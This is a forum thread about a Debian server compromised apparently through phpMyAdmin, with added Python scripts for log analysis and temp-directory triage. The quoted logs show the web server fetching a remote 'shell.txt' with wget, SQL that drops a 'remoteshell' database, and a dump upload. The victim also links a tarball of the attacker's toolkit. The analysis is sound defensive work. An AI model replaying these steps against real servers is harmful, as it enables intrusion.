Linode Forum
Linode Community Forums
Posted: Tue Jan 03, 2006 1:02 am
Senior Newbie

Joined: Sat Jul 31, 2004 10:47 am
Posts: 11
Hello,

It looks like someone decided to exploit something on my system and set up an ftp site. Must have killed them with the small space. Regardless, it appears that they exploited it somehow using the www-data user that Debian set up. I am running testing. Does anyone know what could have been used to open the exploit? I want to patch it ASAP.

Thanks!


Posted: Tue Jan 03, 2006 1:10 am
Junior Member

Joined: Sat Apr 30, 2005 3:38 am
Posts: 23
tavella81 wrote:
Hello,

It looks like someone decided to exploit something on my system and set up an ftp site. Must have killed them with the small space. Regardless, it appears that they exploited it somehow using the www-data user that Debian set up. I am running testing. Does anyone know what could have been used to open the exploit? I want to patch it ASAP.

Thanks!


What web applications do you have on your website? One of them may have a vulnerability some attacker used to gain access to your Linode.


Posted: Tue Jan 03, 2006 1:11 am
Senior Newbie

Joined: Sat Jul 31, 2004 10:47 am
Posts: 11
I'm thinking it was phpmyadmin that allowed it. There was a file named old.php with mysql/mysql as the owner. I've removed it now. It looks like the person was using quite a few tools to mess with my system. I'm an idiot. Oh well.... live and learn. I guess the best part is I have the IPs of the person who created/accessed and all of the people who were downloading the software off of my system. I think I'm going to contact their ISPs.


Posted: Tue Jan 03, 2006 1:15 am
Junior Member

Joined: Sat Apr 30, 2005 3:38 am
Posts: 23
tavella81 wrote:
I'm thinking it was phpmyadmin that allowed it. There was a file named old.php with mysql/mysql as the owner. I've removed it now. It looks like the person was using quite a few tools to mess with my system. I'm an idiot. Oh well.... live and learn. I guess the best part is I have the IPs of the person who created/accessed and all of the people who were downloading the software off of my system. I think I'm going to contact their ISPs.


Review your webserver logs, see what they did. I'd love to know what they exploited. I'm willing to spend a few minutes and review your webserver logs if you want.


Posted: Tue Jan 03, 2006 1:25 am
Senior Newbie

Joined: Sat Jul 31, 2004 10:47 am
Posts: 11
Thanks. I'll post them... I'll tar the entire package.

http://www.avella.name/hack.tar

The tar is almost 26 megs. It includes their little toolkit. I found it because I did a ps -ax like I normally do and saw ./ftpd running... First clue that wasn't me.... Thanks!

Oh! The old.php was in my /var/www directory with the owner of mysql:mysql.


Posted: Tue Jan 03, 2006 1:32 am
Junior Member

Joined: Sat Apr 30, 2005 3:38 am
Posts: 23
Code:
[Fri Dec 30 19:22:42 2005] [error] [client 84.159.66.132] File does not exist: /var/www/avella/phpmyadmin/css/themes, referer: http://www.avella.name/phpmyadmin/css/phpmyadmin.css.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&js_frame=right&js_isDOM=1
--19:22:59--  http://mitglied.lycos.de/oldmeal1/shell.txt
           => `shell.txt'
Resolving mitglied.lycos.de... 212.78.204.20
Connecting to mitglied.lycos.de|212.78.204.20|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5,211 (5.1K) [text/plain]

    0K .....                                                 100%   34.71 KB/s

19:23:00 (34.71 KB/s) - `shell.txt' saved [5211/5211]


That's from your error log. Can you tar up (and gzip, please) your access log for 12/30/2005?


Posted: Tue Jan 03, 2006 1:37 am
Senior Newbie

Joined: Sat Jul 31, 2004 10:47 am
Posts: 11
http://www.avella.name/access.log.tar.gz


Posted: Tue Jan 03, 2006 1:44 am
Junior Member

Joined: Sat Apr 30, 2005 3:38 am
Posts: 23
Looks like they were xfering this game through your Linode:

http://www.torrentz.com/torrent_381534.html

They may have exploited some portion of MySQL through phpMyAdmin, using a database called remoteshell:

84.159.66.132 - - [30/Dec/2005:19:21:57 -0500] "GET /phpmyadmin/sql.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=remoteshell&goto=db_details_structure.php&sql_query=DROP+DATABASE+%60remoteshell%60&zero_rows=Datenbank+%60remoteshell%60+wurde+gel%C3%B6scht.&goto=main.php&back=db_details_structure.php&reload=1&purge=1&is_js_confirmed=1 HTTP/1.1" 200 6635 "http://www.avella.name/phpmyadmin/db_details_structure.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=remoteshell" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8) Gecko/20051111 Firefox/1.5"

Then they restored a database dump via POST:

84.159.66.132 - - [30/Dec/2005:19:22:20 -0500] "POST /phpmyadmin/read_dump.php HTTP/1.1" 200 4760 "http://www.avella.name/phpmyadmin/db_details.php?lang=de-utf-8&server=1&collation_connection=utf8_general_ci&db=mysql&goto=db_details_structure.php&db_query_force=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8) Gecko/20051111 Firefox/1.5"

And they did another database dump via POST, which somehow resulted in /old.php getting created.

Because access logs don't log POST data, I can't tell exactly what happened, but I can make an educated guess. The above wget command in the error logs was probably caused by phpmyadmin.css.php mis-parsing the contents of a database in MySQL. It looks like it may have made PHP execute some PHP code that resided in the remoteshell database.

Can you dump that database to a text file if you've still got it?

[will edit later with more info dug up]


Last edited by warewolf on Tue Jan 03, 2006 2:01 am, edited 3 times in total.
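The kind of pass warewolf made over the access and error logs, written out as a small script. This is an added example, not code from the thread or from anyone in it. Its log lines are constructed to mirror the quoted ones (same phpMyAdmin scripts and parameters) but use RFC 5737 documentation addresses and example.net hostnames; the allowlist of known databases and the set of dump-import scripts are assumptions a real deployment would adjust.

```python
"""Flag the phpMyAdmin activity described in the thread across a few log lines.

Added example (not from the forum thread). The sample log lines are constructed:
same scripts and parameters as the quoted evidence, placeholder addresses/hosts.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Statements in a sql_query parameter that alter schema or reach the filesystem
DANGEROUS_SQL = re.compile(r'\b(DROP|CREATE|ALTER|GRANT|INTO\s+OUTFILE|LOAD_FILE)\b', re.I)
# phpMyAdmin scripts that import an uploaded SQL dump (assumed set; body is never in the access log)
DUMP_IMPORTERS = {"read_dump.php", "import.php"}
# Databases expected on this host (constructed allowlist; adjust per server)
KNOWN_DATABASES = {"mysql", "information_schema"}
# Every line Apache itself writes to error_log starts with a bracketed timestamp
APACHE_ERROR_PREFIX = re.compile(r'^\[\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}\]')

# Constructed access-log excerpt modelled on the thread's quoted lines
ACCESS_LOG = """\
198.51.100.7 - - [30/Dec/2005:19:20:01 -0500] "GET /phpmyadmin/main.php?lang=de-utf-8&server=1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [30/Dec/2005:19:21:57 -0500] "GET /phpmyadmin/sql.php?lang=de-utf-8&server=1&db=remoteshell&sql_query=DROP+DATABASE+%60remoteshell%60&zero_rows=Datenbank+%60remoteshell%60+wurde+gel%C3%B6scht. HTTP/1.1" 200 6635 "http://www.example.net/phpmyadmin/db_details_structure.php?db=remoteshell" "Mozilla/5.0"
198.51.100.7 - - [30/Dec/2005:19:22:20 -0500] "POST /phpmyadmin/read_dump.php HTTP/1.1" 200 4760 "http://www.example.net/phpmyadmin/db_details.php?db=mysql" "Mozilla/5.0"
203.0.113.9 - - [30/Dec/2005:19:25:00 -0500] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Constructed error-log excerpt: one Apache line followed by a wget transcript
ERROR_LOG = """\
[Fri Dec 30 19:22:42 2005] [error] [client 198.51.100.7] File does not exist: /var/www/example/phpmyadmin/css/themes
--19:22:59--  http://files.example.net/shell.txt
           => `shell.txt'
Resolving files.example.net... 192.0.2.10
HTTP request sent, awaiting response... 200 OK
19:23:00 (34.71 KB/s) - `shell.txt' saved [5211/5211]
"""


def parse_combined(line):
    """Split one combined-format line into fields, or None if it does not parse."""
    m = COMBINED_RE.match(line.strip())
    return m.groupdict() if m else None


def analyse_request(line):
    """Return finding strings for one access-log line; empty list when nothing stands out."""
    rec = parse_combined(line)
    if rec is None:
        return []
    url = urlsplit(rec["target"])
    if "/phpmyadmin/" not in url.path.lower():
        return []
    script = url.path.rsplit("/", 1)[-1]
    params = parse_qs(url.query)  # decodes %XX escapes and '+' for us
    where = f"{rec['host']} [{rec['time']}]"
    findings = []
    for q in params.get("sql_query", []):  # 1. schema-changing SQL sent through sql.php
        if DANGEROUS_SQL.search(q):
            findings.append(f"{where} sql_query={q!r} (db={params.get('db', ['-'])[0]})")
    if rec["method"] == "POST" and script in DUMP_IMPORTERS:  # 2. dump upload, body unseen
        findings.append(f"{where} POST {script}: SQL dump import, body not logged")
    for db in params.get("db", []):  # 3. a database nobody on the box created on purpose
        if db.lower() not in KNOWN_DATABASES:
            findings.append(f"{where} unknown database {db!r} addressed via {script}")
    return findings


def scan_access_log(text):
    """All findings over a whole access-log excerpt, in log order."""
    return [f for line in text.splitlines() if line.strip() for f in analyse_request(line)]


def foreign_error_log_lines(text):
    """Lines in error_log that Apache did not write itself: output of a program the
    web server process spawned, which is what the wget transcript in the thread was."""
    return [l for l in text.splitlines() if l.strip() and not APACHE_ERROR_PREFIX.match(l)]


if __name__ == "__main__":
    for finding in scan_access_log(ACCESS_LOG):
        print(finding)
    for foreign in foreign_error_log_lines(ERROR_LOG):
        print("non-Apache error_log line:", foreign)
```

The third check is the one that matters most on a quiet server: a database name that nobody provisioned shows up in `db=` long before any dangerous verb does, and it survives even when the interesting part of the request went over POST.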

Posted: Tue Jan 03, 2006 1:47 am
Senior Newbie

Joined: Sat Jul 31, 2004 10:47 am
Posts: 11
Thanks for your help!


Posted: Tue Jan 03, 2006 2:01 am
Junior Member

Joined: Sat Apr 30, 2005 3:38 am
Posts: 23
Can you dump the remoteshell mysql database to a text file using mysqldump?


Posted: Tue Jan 03, 2006 2:13 am
Senior Newbie

Joined: Sat Jul 31, 2004 10:47 am
Posts: 11
I've never done it before but I'll give it a try.... hold.

Starting MySQL database server: mysqld...failed.
Please take a look at the syslog.
/usr/bin/mysqladmin: connect to server at 'localhost' failed
error: 'Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)'
Check that mysqld is running and that the socket: '/var/run/mysqld/mysqld.sock' exists!

I rebooted my system to make sure that no other programs were running that I wasn't aware of...

If you have an idea as to how to restore the mysql server, I'll give the dump. I'm off to bed right now since I have to be at work in 5 hours. Thanks for your help and I'll follow up tomorrow.


Posted: Tue Jan 03, 2006 2:30 am
Junior Member

Joined: Sat Apr 30, 2005 3:38 am
Posts: 23
It looks like mysqld isn't running. Try starting it via /etc/init.d/mysqld start (if you're running a SysV style distro)

mysqldump -u root -p remoteshell > remoteshell.txt
(then enter your root mysql password at the prompt)


Posted: Tue Jan 03, 2006 11:36 am
Newbie

Joined: Tue Jul 12, 2005 3:59 pm
Posts: 3
Website: http://www.nogbors-store.co.uk
WLM: nogbor@msn.com
Location: UK
I suffered a similar problem recently which kept killing my MySQL server.

Fortunately it restarted with a reboot.

I found a directory under /var/tmp/ that had no name but appeared to contain some sort of pseudo server.

It may be worth checking for this folder.
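A triage check for the two indicators this thread turns up: the nameless directory under /var/tmp described just above, and the ./ftpd process tavella81 noticed earlier in ps output. This is an added example, not code from the thread. The directory tree it builds is constructed for the demonstration, and the heuristics (names made only of dots or whitespace, executables sitting in a temp directory, command lines launched from a relative path) are mine, not anything the posters used.

```python
"""Triage helpers for oddly named temp directories and relative-path processes.

Added example (not from the forum thread). build_sample_tree() constructs a
throwaway directory that resembles what nogbor described; nothing here touches
the real /var/tmp unless you call scan_dir() on it yourself.
"""
import os
import re
import shutil
import stat
import tempfile

# Names that render as blank or dot-only hide well in casual `ls` output
ODD_NAME = re.compile(r'^[\s.]+$')
# A command line beginning ./ or ../ was started from a working directory, not a package path
RELATIVE_EXEC = re.compile(r'^\.{1,2}/')


def is_odd_name(name):
    """True for names that are only dots/whitespace or carry control characters."""
    return bool(ODD_NAME.match(name)) or any(ord(c) < 32 or c == "\x7f" for c in name)


def scan_dir(root):
    """Return (path, reason) pairs for odd names and executable files directly under root."""
    findings = []
    try:
        entries = os.listdir(root)
    except FileNotFoundError:
        return findings
    for name in entries:
        path = os.path.join(root, name)
        if is_odd_name(name):
            findings.append((path, "odd name"))
        try:
            st = os.lstat(path)  # lstat: do not follow symlinks planted in a temp dir
        except OSError:
            continue
        if stat.S_ISREG(st.st_mode) and st.st_mode & 0o111:
            findings.append((path, "executable file in temp dir"))
    return findings


def suspicious_cmdline(cmdline):
    """A process that ps shows as ./something (as in the thread) merits a closer look."""
    return bool(RELATIVE_EXEC.match(cmdline.strip()))


def build_sample_tree():
    """Constructed sample: a temp dir with a space-named dir, a dots-only dir,
    a benign dir and an executable named like the rogue daemon from the thread."""
    root = tempfile.mkdtemp(prefix="triage-demo-")
    os.mkdir(os.path.join(root, " "))     # directory whose name is a single space
    os.mkdir(os.path.join(root, "..."))   # three dots: legal name, easy to overlook
    os.mkdir(os.path.join(root, "php_sessions"))  # ordinary, should not be flagged
    exe = os.path.join(root, "ftpd")
    with open(exe, "w") as fh:
        fh.write("#!/bin/sh\nexit 0\n")
    os.chmod(exe, 0o755)
    return root


def demo():
    """Scan the constructed tree and return the sorted list of reasons raised."""
    root = build_sample_tree()
    try:
        return sorted(reason for _, reason in scan_dir(root))
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for reason in demo():
        print(reason)
    for cmd in ("./ftpd", "/usr/sbin/sshd -D"):
        print(cmd, "->", "suspicious" if suspicious_cmdline(cmd) else "ok")
```

On a live box, point scan_dir() at /var/tmp, /tmp and /dev/shm in turn, and feed suspicious_cmdline() the second column of `ps -ax -o pid=,args=`; the demo keeps everything inside a scratch directory so it runs anywhere.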


Posted: Tue Jan 03, 2006 8:13 pm
Senior Newbie

Joined: Sat Jul 31, 2004 10:47 am
Posts: 11
I checked the folder and kept all of the info. When I run /etc/init.d/mysql start I receive the message above. If I type just mysqld I get the following:

avella:~# mysqld
060103 19:13:11 InnoDB: Database was not shut down normally!
InnoDB: Starting crash recovery.
InnoDB: Reading tablespace information from the .ibd files...
InnoDB: Restoring possible half-written data pages from the doublewrite
InnoDB: buffer...
060103 19:13:12 InnoDB: Starting log scan based on checkpoint at
InnoDB: log sequence number 0 47300.
InnoDB: Doing recovery: scanned up to log sequence number 0 47346
InnoDB: Last MySQL binlog file position 0 79, file name /var/log/mysql/mysql-bin.000121
060103 19:13:12 InnoDB: Flushing modified pages from the buffer pool...
060103 19:13:12 InnoDB: Started; log sequence number 0 47346
060103 19:13:12 [ERROR] Fatal error: Can't open and lock privilege tables: Table 'mysql.host' doesn't exist

I'm lost... I don't want to potentially lose what they posted. How can I go about restoring my data?


Posted: Thu Jan 05, 2006 6:51 am

Joined: Thu Jan 05, 2006 6:37 am
Posts: 1
tavella81 wrote:
I've never done it before but I'll give it a try.... hold.

Starting MySQL database server: mysqld...failed.
Please take a look at the syslog.
/usr/bin/mysqladmin: connect to server at 'localhost' failed
error: 'Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)'
Check that mysqld is running and that the socket: '/var/run/mysqld/mysqld.sock' exists!

I rebooted my system to make sure that no other programs were running that I wasn't aware of...

If you have an idea as how to restore the mysql server, I'll give the dump. I'm off to bed right now since I have to be at work in 5 hours. Thanks for your help and I'll follow-up tomorrow.


Did you do "apt-get upgrade" recently? If so, check if /lib/tls exists. That is evil. You've got to watch for it when you do an upgrade and remove it every time it shows up again.

